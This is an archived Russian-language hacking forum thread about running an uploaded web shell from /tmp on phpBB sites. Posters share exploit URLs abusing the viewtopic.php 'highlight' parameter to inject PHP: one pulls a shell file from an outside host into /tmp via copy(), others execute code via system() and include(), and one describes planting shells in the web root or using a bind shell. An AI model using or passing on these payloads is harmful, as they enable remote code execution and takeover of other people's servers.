Форумы Если заливаю шелл в /tmp, смогу ли его запустить из браузера?

Discussion in 'Уязвимости CMS/форумов' started by Placinta, 25 Dec 2004.

  1. Placinta

    Placinta New Member

    Joined:
    25 Dec 2004
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Я знаю что вех уже задолбал phpBB но я хочу коешто уточнить.
    Говорят что на 90% компов папка /tmp открыта для записи.
    Я верю но, даже если я залью шелл в /tmp, как я могу его запустить из браузера.
    Жду ответов.
     
  2. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Напиши плиззз комманду, которая зальёт этот шелл в твою папку..
     
  3. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    никак. Шелл наао заливать в папку с самим сайтом. Хотя смотря какой шелл.
     
  4. onyx3

    onyx3 New Member

    Joined:
    21 Dec 2004
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    Ну вот ты какой коммандой залил свой шелл в папку /tmp ???
     
  5. Placinta

    Placinta New Member

    Joined:
    25 Dec 2004
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    А какой шелл можно заливать не в папку с сайтом? Скажи имя, И если не жалко и его адрес.
     
  6. Placinta

    Placinta New Member

    Joined:
    25 Dec 2004
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    Вот такой.
    viewtopic.php?a=http://seechat.fatal.ru/sql.hp&b=/tmp/remview.php&t=470&highlight=%2527%252ecopy($_GET[a],$_GET)%252e%2527
     
  7. LittleLamer

    LittleLamer Elder - Старейшина

    Joined:
    4 Nov 2004
    Messages:
    44
    Likes Received:
    17
    Reputations:
    7
    если файл 1.php лежит в /tmp, то можешь запустить так
    viewtopic.php?t=[topic]&highlight=%2527.system($_GET[cmd]).%2527&cmd=php /tmp/1.php
     
  8. Placinta

    Placinta New Member

    Joined:
    25 Dec 2004
    Messages:
    6
    Likes Received:
    0
    Reputations:
    0
    увы не получится. Там закрыт и shell и system()
     
  9. LittleLamer

    LittleLamer Elder - Старейшина

    Joined:
    4 Nov 2004
    Messages:
    44
    Likes Received:
    17
    Reputations:
    7
    viewtopic.php?t=[topic]&highlight=%2527.include($_GET[cmd]).%2527&cmd=/tmp/1.php
    хотя не обязательно сработает, но попытка - не пытка =)
     
  10. kyzmi4

    kyzmi4 Elder - Старейшина

    Joined:
    19 Jul 2004
    Messages:
    113
    Likes Received:
    35
    Reputations:
    5
    кароче обьясню на пальцах.
    пример:
    Ставим апаче.
    Диск С это диск, который юзверь не видит. Папка html это папка откуда грузится сайт. Так вот если нужно что-бы веб-шелл грузил по такому методу http://bla-bla.ru/shell/shell.php то он должен быть залить в папку /html/shell/ а если ты зальеш выше папки html то ты его просто не откроеш
    Случай 2.
    Заливаем на диск С файл, который открывает на серваке порт и ждет команд, коннектимся к серву на этот порт и вот у нас шелл =)

    ЗЫ Обьяснял на пальцах. Нимного не так. Если учесть что большинство серваков стоят на никсах и там нету диска С, но суть помойму высказал.

    ЗЗЫ Многие серваки просто не пустят в папку /tmp =)